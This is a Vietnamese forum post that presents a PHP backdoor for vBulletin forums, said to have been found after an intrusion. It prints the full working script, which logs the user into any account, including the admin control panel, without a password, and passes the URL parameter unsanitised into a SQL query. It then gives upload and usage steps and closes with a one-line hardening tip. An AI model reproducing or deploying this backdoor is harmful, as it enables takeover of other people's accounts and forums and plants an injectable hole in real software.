Ngày xưa 4rum mình bị hack thằng nào đó nó up lên, xem log tình cờ phát hiện ra, chưa rõ nguồn gốc xuất xứ Code này có tác dụng là khi upload vào thư mục root của 4rumVBB các bạn có khả năng đăng nhập vào nick bất cứ thành viên nào mà không cần password. Ngoài ra vào đc thẳng admincp mà ko cần gõ lại pass Mã: [COLOR=#000000] [COLOR=#0000BB]<?php [/COLOR][COLOR=#007700]if (isset([/COLOR][COLOR=#0000BB]$_GET[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'bd'[/COLOR][COLOR=#007700]])) { [/COLOR][COLOR=#0000BB]define[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'THIS_SCRIPT'[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]'login'[/COLOR][COLOR=#007700]); require_once([/COLOR][COLOR=#DD0000]'./global.php'[/COLOR][COLOR=#007700]); require_once([/COLOR][COLOR=#DD0000]'./includes/functions_login.php'[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]$vbulletin[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]userinfo [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$vbulletin[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]db[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]query_first[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]TABLE_PREFIX [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#DD0000]"user WHERE username = '" [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]$_GET[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'bd'[/COLOR][COLOR=#007700]] . [/COLOR][COLOR=#DD0000]"'"[/COLOR][COLOR=#007700]); if (![/COLOR][COLOR=#0000BB]$vbulletin[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]userinfo[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'userid'[/COLOR][COLOR=#007700]]) die([/COLOR][COLOR=#DD0000]"Invalid username!"[/COLOR][COLOR=#007700]); else { [/COLOR][COLOR=#0000BB]vbsetcookie[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'userid'[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]$vbulletin[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]userinfo[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'userid'[/COLOR][COLOR=#007700]], [/COLOR][COLOR=#0000BB]true[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]true[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]true[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]vbsetcookie[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'password'[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]md5[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$vbulletin[/COLOR][COLOR=#007700]->[/COLOR][COLOR=#0000BB]userinfo[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'password'[/COLOR][COLOR=#007700]] . [/COLOR][COLOR=#0000BB]COOKIE_SALT[/COLOR][COLOR=#007700]), [/COLOR][COLOR=#0000BB]true[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]true[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]true[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]exec_unstrike_user[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$_GET[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'bd'[/COLOR][COLOR=#007700]]); [/COLOR][COLOR=#0000BB]process_new_login[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]'cplogin'[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]TRUE[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]TRUE[/COLOR][COLOR=#007700]); [/COLOR][COLOR=#0000BB]do_login_redirect[/COLOR][COLOR=#007700](); } } [/COLOR][COLOR=#0000BB]?>[/COLOR] [/COLOR] Copy đoạn code trên vào notepad save đuôi viethung.php Upload vào thư mục chứa 4rum ngang hàng với file index.php Sau đó chạy link sau http://domain.com/forum/viethung.php?bd=username bài này mình tìm hiểu để cho 4rum bào mật hơn Giải pháp: Tạo thêm 1 lớp mật khẩu cho VBB tại admincp.